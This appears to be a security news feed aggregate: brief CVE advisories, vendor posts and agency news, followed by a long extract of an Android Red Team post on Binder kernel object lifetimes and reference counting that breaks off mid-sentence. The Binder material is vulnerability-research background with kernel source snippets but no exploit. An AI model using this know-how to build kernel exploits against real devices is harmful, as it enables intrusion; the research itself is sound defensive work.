James O’Donnell, director of research & consulting at TransUnion in the UK, comments on the recent Bank of England Money and Credit statistics.  “The Bank of England’s latest Money and Credit report for August 2024 shows a continued rise in mortgage borrowing, with individuals borrowing a net £2.9 billion, slightly up from £2.8 billion in July, which continues to be the highest since November 2022. Mortgage approvals for house purchases remain strong, with an increase from 62,500 in July to 64,900 in August – the highest level since August 2022. “The increase in house purchase activity should also be taken in context of normal market seasonality. We’re moving away from peak summer activity into the winter low period. The question becomes one of whether borrowing activity will grow over Q4 due to lower interest rates, thus bucking the winter seasonal trend? We will be watching this closely over the next few months. “Consumer credit borrowing remains strong, with net borrowing reaching £1.3 billion, building on the £1.2 billion reported in July, but the rate of growth appears to be slowing down with August net borrowing slightly dropping to 7.6% year-on-year from the 7.8% seen in July. This indicates that we’re seeing balance growth stabilise on the back of lower price inflation in recent months across most consumer goods and services, and consumers might finally be finding their feet on stable ground. With these trends, lenders must remain vigilant in managing risk and ensuring responsible lending practices as these economic conditions continue to evolve.”

https://newsroom.transunion.co.uk/mortgage-approvals-for-house-purchases-highest-since-august-2022/
Vulnerability in Redlink SDK
2024-09-30T13:30:00Z | 1727703000

Resource Injection vulnerability (CVE-2024-6051) has been found in Vercom S.A. Redlink SDK.

https://cert.pl/en/posts/2024/09/CVE-2024-6051/
Our New Carbon Calculator Report Supports 400 Days of Data
2024-09-30T13:00:00Z | 1727701200

The new Carbon Calculator is supported by the latest reporting API framework, improves performance, and allows customers to monitor up to 400 days of data.

https://www.akamai.com/blog/sustainability/2024/sep/new-carbon-calculator-report-supports-400-days-data
Uuring: ligi kümnendik Eesti elanikest ei pööra küberohtudele üldse tähelepanu
2024-09-30T10:05:46Z | 1727690746

Värsked küsitlustulemused näitavad, et valdav osa Eesti elanikest järgib internetis vähemalt mõnda turvalise käitumise soovitust, aga ligi kümme protsenti inimestest ei kasuta mitte ühtegi. Samal ajal on mõjuga küberintsidentide arv Eestis aastaga ligi kahekordistunud.

https://ria.ee/uudised/uuring-ligi-kumnendik-eesti-elanikest-ei-poora-kuberohtudele-uldse-tahelepanu
The Four Transformational Impacts of SASE: Revolutionizing IT Infrastructure with Cato
2024-09-30T09:03:15Z | 1727686995

In today’s fast-paced digital landscape, IT departments face unprecedented challenges. From managing increasingly fragmented infrastructures to ensuring robust security, the demands on IT teams have never been higher. Secure Access Service Edge (SASE) represents a groundbreaking approach to addressing these challenges by converging networking and security into a unified, cloud-native platform. But what makes a... The post The Four Transformational Impacts of SASE: Revolutionizing IT Infrastructure with Cato  appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-four-transformational-impacts-of-sase/
Event Log Talks a Lot: Identifying Human-operated Ransomware through Windows Event Logs
2024-09-30T06:55:00Z | 1727679300

The difficult part of the initial response to a human-operated ransomware attack is identifying the attack vector. You may already know from recent security incident trends that the vulnerabilities of VPN devices are likely to be exploited, but it often...

https://blogs.jpcert.or.jp/en/2024/09/windows.html
Security Alert (A24-09-23): Multiple Vulnerabilities in Microsoft Edge
2024-09-30T04:00:00Z | 1727668800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Fal.Con 2024 Recap: Enforcing Cyber-Resiliency through Proactive Security by Zoey Chu
2024-09-30T00:00:00Z | 1727654400

Discover key insights from Fal.Con 2024 on how proactive security and vendor integrations, like Vectra AI and CrowdStrike, drive cyber-resiliency.

https://www.vectra.ai/blog/fal-con-2024-recap-enforcing-cyber-resiliency-through-proactive-security
What Are Hackers Searching for in SolarWinds Serv-U (CVE-2024-28995)?
2024-09-30T00:00:00Z | 1727654400

Discover how GreyNoise’s honeypots are monitoring exploit attempts on the SolarWinds Serv-U vulnerability (CVE-2024-28995). Gain insights into the specific files attackers target and how real-time data helps security teams focus on true threats. Read our full blog for detailed analysis.

https://www.greynoise.io/blog/what-are-hackers-searching-for-in-solarwinds-serv-u-cve-2024-28995
MEDIA ALERT: Top Global Brands and Trevor Noah, Emmy Award-Winning Comedian, Podcast Host & Bestselling Author, Take Center Stage at Cisco's WebexOne Event
2024-09-27T15:00:00Z | 1727449200

Cisco (NASDAQ: CSCO) today announced its luminary customers and partners headlining WebexOne, Cisco’s annual AI Collaboration and Customer Experience event. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m09/media-alert-top-global-brands-and-trevor-noah-emmy-award-winning-comedian-podcast-host-bestselling-author-take-center-stage-at-cisco-webexone-event.html
Common UNIX Printing System (CUPS) Vulnerabilities
2024-09-27T13:40:07Z | 1727444407

Common UNIX Printing System (CUPS) is an open-source printing system for Linux and other UNIX-like operating systems. CUPS uses the IPP (Internet Printing Protocol) to allow for printing with local and network printers. By combining these vulnerabilities (CVE-2024-47076, CVE-2024-47177, CVE-2024-47175, and CVE-2024-47176), an attacker could potentially execute remote code, which may result in the theft of sensitive information and/or cause damage to essential production systems.The SonicWall PSIRT has analyzed CVE-2024-47076, CVE-2024-47177, CVE-2024-47175, and CVE-2024-47176 in the Common UNIX Printing System (CUPS) to assess their relevance to our products and services.SonicWall products and cloud services do not incorporate the impacted CUPS software packages and are not affected by these vulnerabilities.SonicWall PSIRT is aware that a proof of concept (PoC) exploit for this vulnerabilities is publicly available, we have no information regarding any exploitation of this vulnerability in the wild. CVE: CVE-2024-47076, CVE-2024-47177, CVE-2024-47175, CVE-2024-47176 Last updated: Sept. 27, 2024, 1:40 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0016
Too Good To Be True? For True Value, Look Beyond Vendors? Sales Claims
2024-09-27T13:00:00Z | 1727442000

https://www.akamai.com/blog/performance/2024/sep/look-beyond-vendors-sales-claims
Eesti.ee mobiilirakendust hakkab testima 2300 kasutajat
2024-09-27T08:47:00Z | 1727426820

Eile lõppes Eesti.ee mobiilirakenduse testijaks registreerimine – riigiäppi hakkab testima 2300 kasutajat. Testimine algab 7. oktoobril ja kestab kaks nädalat. Selle aja jooksul saavad testijad rakendust proovida ning anda tagasisidet, mis aitab arendusmeeskonnal luua kasutajate vajadustele vastava riikliku mobiilirakenduse.

https://ria.ee/uudised/eestiee-mobiilirakendust-hakkab-testima-2300-kasutajat
National Cyber Security Centre's weekly review – 38/2024
2024-09-27T08:07:19Z | 1727424439

This week, we cover topics such as carpet bombing in denial-of-service attacks and how the first year of the Hyöky service went.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-382024
National Cyber Security Centre's weekly review – 38/2024
2024-09-27T08:07:19Z | 1727424439

This week, we cover topics such as carpet bombing in denial-of-service attacks and how the first year of the Hyöky service went.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-382024
Keep Your Tech Flame Alive: Akamai Trailblazer Sabine A. Sitterli
2024-09-26T13:00:00Z | 1727355600

https://www.akamai.com/blog/culture/2024/sep/keep-your-tech-flame-alive-akamai-trailblazer-sabine-sitterli
End-to-End Security for APIs: From Development Through Retirement
2024-09-26T11:00:00Z | 1727348400

https://www.akamai.com/blog/security/2024/sep/end-to-end-security-for-apis-from-development-through-retirement
Valmis said turvalise interneti juhendmaterjalid lastele ja lapsevanematele
2024-09-26T08:45:19Z | 1727340319

Ilmunud on algkoolieas lastele ja nende vanematele mõeldud eestikeelsed juhendmaterjalid, mis aitavad interneti kasutamisega seotud ohte ära tunda ja vältida.

https://ria.ee/uudised/valmis-said-turvalise-interneti-juhendmaterjalid-lastele-ja-lapsevanematele
CyberKnight signs partnership with Forescout to offer complete asset intelligence and control across IT, OT, and IoT
2024-09-26T08:10:22Z | 1727338222

The post CyberKnight signs partnership with Forescout to offer complete asset intelligence and control across IT, OT, and IoT appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-signs-partnership-with-forescout-to-offer-complete-asset-intelligence-and-control-across-it-ot-and-iot/
CyberKnight signs partnership with Digital.ai to enhance application security in the Middle East
2024-09-26T08:06:47Z | 1727338007

The post CyberKnight signs partnership with Digital.ai to enhance application security in the Middle East appeared first on CyberKnight.

https://cyberknight.tech/blog/cyberknight-signs-partnership-with-digital-ai-to-enhance-application-security-in-the-middle-east/
Security Alert (A24-09-21): Multiple Vulnerabilities in Cisco Products
2024-09-26T04:00:00Z | 1727323200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-09-22): Multiple Vulnerabilities in Google Chrome
2024-09-26T04:00:00Z | 1727323200

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Pentest pode salvar sua empresa de ataques hackers
2024-09-25T23:53:41Z | 1727308421

https://nsfocusglobal.com/web-stories/penteste-pode-salvar-sua-empresa/
GITEX Global 2024
2024-09-25T12:00:22Z | 1727265622

October 14th - 18th 2024 Location: Dubai World Trade Center The post GITEX Global 2024 appeared first on CyberKnight.

https://cyberknight.tech/blog/gitex-global-2024/
2024 Frost & Sullivan Enabling Technology Award
2024-09-25T12:00:00Z | 1727265600

The post 2024 Frost & Sullivan Enabling Technology Award appeared first on Cato Networks.

https://www.catonetworks.com/resources/2024-frost-sullivan-enabling-technology-award/
MENA ISC 2024
2024-09-25T11:00:10Z | 1727262010

September 10th - 11th 2024 Location: Riyadh, Saudi Arabia The post MENA ISC 2024 appeared first on CyberKnight.

https://cyberknight.tech/blog/mena-isc-2024/
Caisec 2024
2024-09-25T10:00:52Z | 1727258452

June 4th – 5th 2024 Location: Dubai World Trade Center The post Caisec 2024 appeared first on CyberKnight.

https://cyberknight.tech/blog/caisec-2024-2/
Microsoft Pragmatic General Multicast Server PgmCloseConnection stale memory dereference
2024-09-25T00:00:00Z | 1727222400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2062
Phishing and Social Engineering: The Human Factor in Election Security
2024-09-25T00:00:00Z | 1727222400

Discover how phishing and social engineering threaten the 2024 U.S. elections in part three of our 'Election Cybersecurity' series. Learn how attackers exploit human vulnerabilities to compromise systems and how to defend against these evolving threats.

https://www.greynoise.io/blog/phishing-and-social-engineering-the-human-factor-in-election-security
A few notes on AWS Nitro Enclaves: Attack surface
2024-09-24T13:00:36Z | 1727182836

In the race to secure cloud applications, AWS Nitro Enclaves have emerged as a powerful tool for isolating sensitive workloads. But with great power comes great responsibility—and potential security pitfalls. As pioneers in confidential computing security, we at Trail of Bits have scrutinized the attack surface of AWS Nitro Enclaves, uncovering potential […]

https://blog.trailofbits.com/2024/09/24/notes-on-aws-nitro-enclaves-attack-surface/
CloudVision: The First Decade
2024-09-24T13:00:00Z | 1727182800

As I think about the evolution of the CloudVisionⓇ platform over the last 10 years, and our latest announcement today, I’m reminded of three principles that have guided us along our journey: full network data without compromise, platform over point product, and a modern operating model. While the product and our plans have evolved over the years, each of these principles feels incredibly relevant to the problems facing enterprises today.

https://blogs.arista.com/blog/cloudvision-the-first-decade
CVE-2024-6787
2024-09-24T12:24:00Z | 1727180640

CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition: This vulnerability occurs when an attacker exploits a race condition between the time a file is checked and the time it is used (TOCTOU). By exploiting this race condition, an attacker can write arbitrary files to the system. This could allow the attacker to execute malicious code and potentially cause file losses.

https://claroty.com/team82/disclosure-dashboard/cve-2024-6787
CVE-2024-6786
2024-09-24T12:22:00Z | 1727180520

CWE-24: Path Traversal: The vulnerability allows an attacker to craft MQTT messages that include relative path traversal sequences, enabling them to read arbitrary files on the system. This could lead to the disclosure of sensitive information, such as configuration files and JWT signing secrets.

https://claroty.com/team82/disclosure-dashboard/cve-2024-6786
CVE-2024-6785
2024-09-24T12:21:00Z | 1727180460

CWE-313: CLEARTEXT STORAGE IN A FILE OR ON DISK The configuration file stores credentials in cleartext. An attacker with local access rights can read or modify the configuration file, potentially resulting in the service being abused because of sensitive information exposure. Moxa recommends the following to address the vulnerabilities: MXview One Series: Upgrade to v1.4.1 MXview One Cerntral Manager Series: Upgrade to v1.0.3 Minimize network exposure to ensure the device is not accessible from the Internet. Change the default credentials immediately upon first login to the service. This helps enhance security and prevent unauthorized access.

https://claroty.com/team82/disclosure-dashboard/cve-2024-6785
How to Define Your Security Objectives Before Choosing an MDR Provider
2024-09-23T18:41:21Z | 1727116881

With nearly every MSSP and Security company claiming to do Managed Detection and Response (MDR) it’s more important than ever to choose the right MDR provider. Before you start evaluating potential partners, it’s crucial to step back and clearly define your organization’s security objectives. This not only helps in selecting the right provider but also […] The post How to Define Your Security Objectives Before Choosing an MDR Provider  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/how-to-define-your-security-objectives-before-choosing-an-mdr-provider/
2024 Q4 Vulnerability Forecast
2024-09-23T00:30:00Z | 1727051400

We’re expecting 9006 +/- 1259 vulnerabilities this quarter, as we close out the year.

https://www.first.org/blog/20240923-Q4Vulnerability-Forecast
2024 Q4 Vulnerability Forecast
2024-09-23T00:30:00Z | 1727051400

We’re expecting 9006 +/- 1259 vulnerabilities this quarter, as we close out the year.

https://www.first.org/blog/20240923-Q4Vulnerability-Forecast
Üle Eesti saab tasuta õppida internetis turvaliselt tegutsema
2024-09-20T14:07:32Z | 1726841252

Alates septembri lõpust korraldatakse üle Eesti 25 täiskasvanutele mõeldud tasuta töötuba, kus õpetatakse internetiga seotud ohte ära tundma ning oma arvuteid ja nutiseadmeid paremini kaitsma.

https://ria.ee/uudised/ule-eesti-saab-tasuta-oppida-internetis-turvaliselt-tegutsema
Security Alert (A24-09-20): Multiple Vulnerabilities in Microsoft Edge
2024-09-20T04:00:00Z | 1726804800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Binder Internals
2024-09-20T00:00:00Z | 1726790400

In our last blog, we talked about Binder CVE-2023-20938 and how we exploited it to get kernel code execution. As you may have already noticed, exploiting this issue is not straightforward. While it is often true that kernel race conditions are notoriously tricky to exploit, the intricacy of the Binder driver’s implementation adds another layer of complexity. This blog post dives deeper into the inner workings of Binder, including the lifecycles of its objects and the underpinnings that keep everything running smoothly across Android. We will also introduce the libdevbinder library we developed during our engagement. This library provides simpler interfaces for researchers interact with the Binder driver for the purpose of learning and experimentation. Binder is an incredibly complicated target! You’ll notice the length of this blog post reflects that complexity, and while we try to cover salient points from the perspective of security research here, there is always more to learn. The Android Red Team believes in empowering the security researcher community; sharing knowledge helps improve security across the entire ecosystem. This blog post aims to help security researchers (like you) learn more about Binder. If you learn enough to find some vulnerabilities, our goal has been achieved (oh and please, let us know!). This is the second post of a multi-part series where we discuss our journey into Binder: Part 1: Attacking Android Binder: Analysis and Exploitation of CVE-2023-20938 Part 2: Binder Internals Lifetime of Binder Objects The use of multiple reference counters and object dependencies introduces complex object lifetime management logic in Binder. When doing vulnerability research, it is helpful to understand the lifetime of every object in Binder as many past vulnerabilities have exploited flaws hidden within them. To highlight the complexity, let’s look at some properties of the binder_node object: Has 4 different reference counters Can be in multiple linked lists owned by other objects, such as a binder_proc and a workqueue One or more associated binder_ref objects hold a pointer to it One or more associated binder_buffer objects hold a pointer to it These properties also result in multiple code paths with different conditions to free a binder_node. Here is a simplified diagram to show dependencies between every data structure in Binder: In the next sections, we will examine the lifetime of several data structures in Binder, focusing on when they are allocated and destroyed. binder_proc The binder_proc object represents a client in Binder. It is the first object to be allocated when a process opens the Binder device node. Note: In contrast to the userspace Binder, a process can act as a server or a client of a service. Throughout this article, we will generally refer to the process that interacts with the Binder device as the client and the Binder device itself as the server. It contains the following fields that determine its lifetime: threads is the root node of a red-black tree that contains all binder_threads it owns. is_dead determines whether the client is dead. tmp_ref tracks the number of local variables holding a pointer to the binder_proc. Allocation Binder allocates and initializes a binder_proc every time a process opens the Binder device node. // === Userspace === int binder_fd = open("/dev/binder", O_RDWR | O_CLOEXEC); // === Kernel === static int binder_open(struct inode *nodp, struct file *filp) { ... proc = kzalloc(sizeof(*proc), GFP_KERNEL); ... } Note: For this blog post, we are diving into the Linux kernel codebase at commit 4df1536, specifically the files within the drivers/android folder. All code snippets are sourced from this folder and are licensed under the GNU General Public License version 2 (GPLv2). You can find the complete source code on GitHub (link). For full license details, please see LICENSE. We have occasionally omitted some code for brevity (indicated by ...) and included additional comments (marked with //). Reference Counters tmp_ref tmp_ref tracks the number of local variables holding a pointer to the binder_proc. Binder increments the tmp_ref counter when a pointer to a binder_proc object is assigned to a local variable [1]. When the pointer variable is no longer in use, Binder decrements the tmp_ref counter with the binder_proc_dec_tmpref function [2]. static void binder_transaction(...) { struct binder_proc *target_proc = NULL; ... target_proc = target_thread->proc; target_proc->tmp_ref++; // [1] ... binder_proc_dec_tmpref(target_proc); // [2] ... } static void binder_proc_dec_tmpref(struct binder_proc *proc) { ... proc->tmp_ref--; ... } The tmp_ref is protected by the binder_proc->inner_lock spinlock to prevent data race. Destroy Binder destroys the binder_proc object with the binder_free_proc function, which is only called by the binder_proc_dec_tmpref function. Binder invokes the binder_proc_dec_tmpref function at multiple locations where it needs to decrement the tmp_ref counter. static void binder_free_proc(struct binder_proc *proc) { ... kfree(proc); } static void binder_proc_dec_tmpref(struct binder_proc *proc) { ... if (proc->is_dead && RB_EMPTY_ROOT(&proc->threads) && !proc->tmp_ref) { binder_inner_proc_unlock(proc); binder_free_proc(proc); return; } ... } Then, the binder_proc object is freed only when all of the following conditions are met: threads: the red-black tree is empty after all binder_thread are released (see binder_thread. is_dead: set to true when closing the Binder file descriptor (binder_thread_release). tmp_ref: set to 0 when there is no temporary variable holding a pointer to the binder_proc. The binder_proc_dec_tmpref is called in several code paths. One common code path is closing the Binder file descriptor, which calls the binder_deferred_released function. // === Userspace === close(binder_fd); // === Kernel === static void binder_deferred_release(struct binder_proc *proc) { ... binder_proc_dec_tmpref(proc); } binder_thread The binder_thread object represents a thread of a client (binder_proc) in Binder. We will delve deeper into multithreaded clients in an upcoming section (Multithreaded Client). The binder_proc maintains a reference to each binder_thread it owns, which is stored in a red-black tree (rb_tree) and the root node is in the threads field. It contains the following fields that determine its lifetime: is_dead determines whether the thread is dead. This is distinct from the client death status (binder_proc->is_dead). Similar to binder_proc->tmp_ref, tmp_ref tracks the number of active local variables holding a pointer to it. Allocation When the process of a client spawns a new thread, the child thread inherits the Binder file descriptor which is associated with the same binder_proc. When the new child thread initiates an ioctl call, Binder first looks up for any existing binder_thread associated with it [1]. If none exists, Binder allocates and initializes a new binder_thread [2, 3]. static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) { int ret; struct binder_proc *proc = filp->private_data; struct binder_thread *thread; ... thread = binder_get_thread(proc); ... } static struct binder_thread *binder_get_thread(struct binder_proc *proc) { struct binder_thread *thread; struct binder_thread *new_thread; ... thread = binder_get_thread_ilocked(proc, NULL); // [1] ... if (!thread) { new_thread = kzalloc(sizeof(*thread), GFP_KERNEL); // [2] ... thread = binder_get_thread_ilocked(proc, new_thread); // [3] ... } ... return thread; } Reference Counters tmp_ref Similar to binder_proc->tmp_ref, tmp_ref tracks the number of local variables holding a pointer to the binder_thread. Binder increments the tmp_ref counter when the pointer to a binder_thread object is assigned to a local variable. When the pointer is no longer in use, Binder decrements the tmp_ref counter. For example, the binder_get_txn_from increments the tmp_ref field before returning the pointer to a binder_thread object [2]. After the pointer is no longer in use, Binder decrements the tmp_ref counter with the binder_thread_dec_tmpref function [1]. static struct binder_thread *binder_get_txn_from_and_acq_inner(...) { struct binder_thread *from; from = binder_get_txn_from(t); ... binder_thread_dec_tmpref(from); // [1] return NULL; } static struct binder_thread *binder_get_txn_from(struct binder_transaction *t) { struct binder_thread *from; ... from = t->from; if (from) atomic_inc(&from->tmp_ref); // [2] ... return from; } static void binder_thread_dec_tmpref(struct binder_thread *thread) { ... atomic_dec(&thread->tmp_ref); ... } Although tmp_ref is an atomic variable (atomic_t), it is also protected by the binder_proc->inner_lock spinlock to prevent data race. Destroy Binder releases a binder_thread object with the binder_free_thread function, which is only called by the binder_thread_dec_tmpref function. Binder invokes the binder_thread_dec_tmpref function at multiple locations where it needs to decrement the tmp_ref counter. static void binder_thread_dec_tmpref(struct binder_thread *thread) { ... if (thread->is_dead && !atomic_read(&thread->tmp_ref)) { ... binder_free_thread(thread); ... } ... } static void binder_free_thread(struct binder_thread *thread) { ... kfree(thread); } The two conditions above are met when: is_dead: set to true when Binder releases the thread binder_thread_release. The binder_thread_release is called when: A thread calls the BINDER_THREAD_EXIT ioctl. The binder_proc and other threads remain unaffected. A client closes the Binder file descriptor (binder_deferred_release), which releases the binder_proc and all binder_thread. tmp_ref: set to 0 when there is no temporary variable holding a pointer to the binder_thread. binder_node A binder_node object represents a port to a client (binder_proc) and has the most complex lifetime management logic. There are three different data structures that hold a reference to a binder_node. Binder must ensure that binder_node stays in memory until all references to it have been removed. Let’s examine each data structure closely. The binder_ref always holds a pointer to a binder_node in its node field. These two objects represent a connection between two clients, allowing them to interact with each other via Binder. We will discuss more about binder_ref in the next section (binder_ref). For example, the diagram below shows Client A has a port (binder_node) which Client B and Client C each has a reference to it (binder_ref). As a result, Client B and Client C can initiate RPCs to Client A. Every binder_proc holds a reference to every binder_node it owns, which is organized in a red-black tree (rb_tree) with the root node stored in the nodes field. The binder_buffer represents a buffer that holds the data of a transaction. It holds a reference to the binder_node, which is the destination port of the transaction. A binder_node also contains the following fields that determine its lifetime: work is a node in a workqueue list when the binder_node is being processed. refs holds the head of the list of all binder_ref linked to it. internal_strong_refs tracks the number of strong references acquired remotely in other clients. local_weak_refs tracks the number of weak references acquired locally. local_strong_refs tracks the number of strong references acquired locally. Similar to binder_proc->tmp_ref, tmp_ref tracks the number of local variables holding a pointer to it. We will revisit all of the above fields later when discussing the deallocation of the binder_node object. Note: Binder kernel driver guarantees that the binder_node object is released when all reference counters, both strong and weak, are zero. The distinction between strong and weak references is primarily significant in userspace for effective memory management. For more details about the usage of these reference types, please refer to the implementation of IBinder and its underlying RefBase class, which provide a reference-counted base class. Allocation Binder allocates a new binder_node with the binder_new_node function when a new port is established. static struct binder_node *binder_new_node(...) { struct binder_node *node; struct binder_node *new_node = kzalloc(sizeof(*node), GFP_KERNEL); ... } Binder and handle Clients embed the flat_binder_object objects within the transaction data to send special data types such as file descriptors, binder and handle. To establish a new port, a client sends a transaction which contains a flat_binder_object object with the header type BINDER_TYPE_BINDER and a binder identifier. Before forwarding the transaction to the receiving client, Binder processes every flat_binder_object in the transaction data. To process flat_binder_object with the header type BINDER_TYPE_BINDER or BINDER_TYPE_WEAK_BINDER, Binder calls the binder_translate_binder function. static void binder_transaction(...) { ... switch (hdr->type) { case BINDER_TYPE_BINDER: case BINDER_TYPE_WEAK_BINDER: { struct flat_binder_object *fp; fp = to_flat_binder_object(hdr); ret = binder_translate_binder(fp, t, thread); // [1] ... } break; ... } In the binder_translate_binder function, Binder searches for any existing port (binder_node) with a matching binder identifier owned by the sending client (binder_proc) [1]. If none exists, Binder allocates a new one and inserts it into the nodes red-black tree [2]. Finally, Binder converts the BINDER_TYPE_*BINDER header type to BINDER_TYPE_*HANDLE [3] and assigns a new handle identifier [4]. static int binder_translate_binder(struct flat_binder_object *fp, struct binder_transaction *t, struct binder_thread *thread) { struct binder_node *node; struct binder_proc *proc = thread->proc; ... node = binder_get_node(proc, fp->binder); // [1] if (!node) { node = binder_new_node(proc, fp); // [2] if (!node) return -ENOMEM; } ... if (fp->hdr.type == BINDER_TYPE_BINDER) fp->hdr.type = BINDER_TYPE_HANDLE; // [3] else fp->hdr.type = BINDER_TYPE_WEAK_HANDLE; // [3] ... fp->handle = rdata.desc; // [4] ... } In the kernel, a binder_node and a binder_ref are created and linked together. Binder uses these two data structures to track every established connection between clients. In the userspace, another client will receive the transaction that contains the flat_binder_object with the header type BINDER_TYPE_HANDLE and a handle identifier. Subsequently, Client B can initiate a transaction or RPC with Client A using the designated handle identifier. Reference Counters When updating a binder_node, the spinlock in its lock field must be acquired to prevent data race. Additionally, if the client that owns a binder_node is alive, the inner_lock of the client binder_proc must also be acquired. The binder_inc_node_nilocked and binder_dec_node_nilocked functions are used to update the following reference counters: internal_strong_refs local_strong_refs local_weak_refs static int binder_inc_node_nilocked(struct binder_node *node, int strong, int internal, ...) static bool binder_dec_node_nilocked(struct binder_node *node, int strong, int internal) This table summarizes which reference counter will be updated by both functions based on the internal and strong parameters. internal 0 1 strong 0 local_weak_refs N/A 1 local_strong_refs internal_strong_refs Note: There is no such field as internal_weak_refs in the binder_node object, so calling the functions with strong set to 0 and internal set to 1 does not modify any reference counter. The internal_weak_refs is implicitly tracked by the length of the binder_proc->refs linked list minus local_weak_refs. Therefore, before freeing a binder_node, Binder checks whether the list is empty. internal_strong_refs The internal_strong_refs represents the number of strong references to a binder_node held by remote clients. Binder tracks this by counting the associated binder_ref with a data.strong value greater than zero. We will cover more about the data.strong counter in the binder_ref section. Binder increments the internal_strong_refs [2] when it increments the data.strong of an associated binder_ref from zero [1]. static int binder_inc_ref_olocked(struct binder_ref *ref, int strong, struct list_head *target_list) { ... if (strong) { if (ref->data.strong == 0) { // [1] ret = binder_inc_node(ref->node, 1, 1, target_list); // [2] if (ret) return ret; } ref->data.strong++; // [1] } else { ... } Binder decrements the internal_strong_refs [2] when the data.strong of an associated binder_ref drops to zero [1]. static bool binder_dec_ref_olocked(struct binder_ref *ref, int strong) { if (strong) { ... ref->data.strong--; // [1] if (ref->data.strong == 0) // [1] binder_dec_node(ref->node, strong, 1); // [2] } else { ... } Upon client exit, Binder clears every binder_ref that the client owns [1]. In cases where a binder_ref has a data.strong value greater than zero [2], Binder then decrements the internal_strong_refs of the corresponding binder_node [3]. static void binder_deferred_release(struct binder_proc *proc) { ... while ((n = rb_first(&proc->refs_by_desc))) { struct binder_ref *ref; ref = rb_entry(n, struct binder_ref, rb_node_desc); ... binder_cleanup_ref_olocked(ref); // [1] ... } ... } static void binder_cleanup_ref_olocked(struct binder_ref *ref) { ... if (ref->data.strong) // [2] binder_dec_node_nilocked(ref->node, 1, 1); // [3] ... } local_strong_refs The local_strong_refs represents the number of strong references to a binder_node held by the client locally. This count increases when the client receives a transaction that either targets the binder_node or includes a BINDER_TYPE_BINDER object that references the binder_node. When a remote client sends a transaction, Binder creates a binder_transaction and a binder_buffer to store the transaction’s metadata. The binder_buffer contains a target_node field which identifies the recipient by pointing to the binder_node owned by the receiving client. This process increments the local_strong_refs count. In addition, receiving a transaction that includes a BINDER_TYPE_BINDER object creates a strong reference to the binder_node that has the matching binder identifier. This also increments the local_strong_refs count. local_weak_refs Like the local_strong_refs, the local_weak_refs represents the number of weak references to a binder_node held by the client locally. Receiving a transaction that includes a BINDER_TYPE_WEAK_BINDER object creates a weak reference locally to the binder_node that has the matching binder identifier. tmp_refs tmp_refs tracks the number of active local variables holding a pointer to it. Binder increments and decrements the tmp_refs counter with the binder_inc_node_tmpref_ilocked and binder_dec_node_tmpref. Destroy Binder destroys a binder_node object with the binder_free_node function. static void binder_free_node(struct binder_node *node) { kfree(node); ... } There are several code paths that frees a binder_node under different conditions: binder_dec_node_nilocked binder_thread_read binder_deferred_release binder_dec_node_nilocked The binder_dec_node_nilocked function decrements one of the binder_node reference counters. It also returns a boolean to notify its caller that it is safe to free the binder_node. static bool binder_dec_node_nilocked(struct binder_node *node, int strong, int internal) { struct binder_proc *proc = node->proc; ... if (strong) { if (internal) node->internal_strong_refs--; else node->local_strong_refs--; if (node->local_strong_refs || node->internal_strong_refs) return false; } else { if (!internal) node->local_weak_refs--; if (node->local_weak_refs || node->tmp_refs || !hlist_empty(&node->refs)) return false; } ... if (proc && (node->has_strong_ref || node->has_weak_ref)) { ... else { if (hlist_empty(&node->refs) && !node->local_strong_refs && !node->local_weak_refs && !node->tmp_refs) { ... return true; In summary, a binder_node can be safely freed only when all of the following conditions are true: binder_node->proc == 0 binder_node->has_strong_ref == 0 binder_node->has_weak_ref == 0 binder_node->internal_strong_refs == 0 binder_node->local_strong_refs == 0 binder_node->local_weak_refs == 0 binder_node->tmp_refs == 0 binder_node->refs == 0 // hlist_empty(node->refs) binder_node->work.entry = &node->work.entry // list_empty(&node->work.entry) The binder_dec_node_nilocked is called by three functions: binder_dec_node binder_dec_node_tmpref binder_free_ref The binder_dec_node is a wrapper function that helps acquire relevant locks. static void binder_dec_node(struct binder_node *node, int strong, int internal) { ... binder_node_inner_lock(node); // Acquire relevant locks free_node = binder_dec_node_nilocked(node, strong, internal); binder_node_inner_unlock(node); if (free_node) binder_free_node(node); } The binder_dec_node is called when Updating the binder_ref strong and weak references. Releasing a transaction (BC_FREE_BUFER) because binder_buffer has a reference to a binder_node. Cleaning up a transaction when Binder failed to process it The binder_dec_node_tmpref is called to decrement the tmp_ref counter of a binder_node. static void binder_dec_node_tmpref(struct binder_node *node) { ... free_node = binder_dec_node_nilocked(node, 0, 1); ... if (free_node) binder_free_node(node); ... } Note: binder_dec_node_nilocked is called here with a strong value of 0 and an internal value of 1. Since there is no internal_weak_refs, this function call does not update any reference counters of a binder_node. The binder_free_ref function is called to clean up a binder_ref before freeing it. static void binder_cleanup_ref_olocked(struct binder_ref *ref) { ... delete_node = binder_dec_node_nilocked(ref->node, 0, 1); ... if (!delete_node) { ... ref->node = NULL; } ... } binder_thread_read After the creation or update of a binder_node, Binder enqueues the binder_node into the client’s workqueue as a BINDER_WORK_NODE work item. When a client reads incoming response (BR_*), Binder calls the binder_thread_read function to transform a work item from the workqueue into a response. Under certain conditions, Binder will free a binder_node when transforming the BINDER_WORK_NODE work item [1]. static int binder_thread_read(...) { ... struct binder_work *w = NULL; ... w = binder_dequeue_work_head_ilocked(list); ... switch (w->type) { ... case BINDER_WORK_NODE: { // [1] ... strong = node->internal_strong_refs || node->local_strong_refs; weak = !hlist_empty(&node->refs) || node->local_weak_refs || node->tmp_refs || strong; ... if (!weak && !strong) { ... binder_free_node(node); The conditions can be 